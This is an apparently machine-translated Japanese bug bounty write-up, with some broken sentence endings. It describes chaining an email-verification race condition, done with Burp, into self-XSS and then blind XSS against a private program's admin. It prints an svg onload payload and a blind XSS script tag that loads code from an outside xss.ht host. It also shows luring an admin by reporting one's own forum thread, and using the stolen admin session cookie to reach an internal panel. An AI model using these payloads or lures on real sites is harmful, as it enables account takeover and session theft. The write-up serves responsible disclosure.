ソース:
訳:
私はすでに 1 週間このプログラムを調査しており、発見したことはすべて報告済みなので、これ以上バグを見つけるのに苦労していました。
しかし、それらが表示されないということは、それらが存在しないという意味ではありません:)
そこで、最初からやり直して、新しいアカウントを作成することにしました。
すべての詳細を入力すると、まずメールアドレスを確認するように求められましたが、間違った場合に備えてメールアドレスを別のメールアドレスに変更することもでき。 Race-Condition については、電子メールを検証せずに使用することを直接考えて。
その方法は次のとおりです (lasok@dot-coin.com にアクセスでき、aa@aa.com に登録したいと想定します)。
1/ アカウントにメールを追加し、確認リンクが記載されたメールを開きますが、まだクリックしないでください (私の場合は、lasok@dot-coin.com を追加し、送信されたメールを開きました)
2/ ウェブサイトで「メールアドレスを変更」をクリックし。
メールアドレスを検証なしで使用するメールアドレスに変更しますが、ここでは送信リンクをクリックしないでください。 (メールアドレスを aa@aa.com に変更しました)
確認リンクをクリックし、同時にメールアドレスを変更する必要があります。
Burp を出さずにこれを行うこともできますが、うまくいくまでに数回試す必要があるかもしれないので、毎回うまくいくようにする方法を次に示して。
Burp を開始し、インターセプトをオンにします
次に、lasok@dot-coin.com で受け取った検証リンクを開き、タブを切り替えて Web サイト (aa@aa.com) で新しい電子メールを検証し、インターセプトをオフにしte 。
Burp は 2 つのリクエストを一緒に転送しte。
これが私たちが望んでいることde。
aa@aa.com が認証され、自分のアカウントにログインできるようになり。
この場合、email@company.com に登録すると、便利な管理機能にアクセスできる場合があり。
しかし、残念ながら、私にとってはそうではありませんでしたが、それでも報告し、予想通り、P5 で終了し。
でもね、私たちは誰で諦めるの?
ここで、有効なバグであるためには、これをエスカレーションして有効な影響を与える必要があります。
数分後、これを XSS にエスカレーションしようとしました。
同じプロセスを実行しましたが、2 番目のステップで偽の電子メールを入力する代わりに、次のように入力しました: <svg/onload=alert(1)> と XSS がトリガーされ。
しかし、私の電子メールは非公開であり、私だけが見ることができるため、これは自己 XSS です。
そこで、Race-Condition (P5) から Self-XSS (P5) に移行しました。
このプライベート プログラムにもサイト専用のフォーラムがあったことを思い出し。
同じプロセスを再度実行しましたが、通常の XSS ペイロードを入力する代わりに、ブラインド XSS ペイロードを入力しました。
私のものは次のとおりです: “></script><script src=//m0m0x01d.xss.ht></script> (ヒント: xsshunter.com ツールを使用してブラインド xss を見つけ)
それから私はフォーラムに行き、新しい奇妙なスレッドを作成し(管理者が確実に削除するように)、自分のスレッドを報告して管理者に確実に表示されるようにし。
数時間以内に、誰かが私の XSS をトリガーしたことを知らせる電子メールが届き。
管理者は私の奇妙なスレッドを見て、私のユーザー名をクリックし、私のプロフィールにリダイレクトされ、XSS がトリガーされ。
この問題が引き起こされた理由は、管理者がユーザーのプロフィールにアクセスするだけでそのユーザーの電子メールを閲覧できる機能を持っていたため。
これで管理者のセッション Cookie を取得し、それを使用して内部パネルにアクセスできるようになり。
私は Bugcrowd で新しいレポートを直接開き、数日後に:
これが、P5 競合状態から P5 セルフ XSS、そして P2 ブラインド XSS へと移行した方法で。
ほなほな。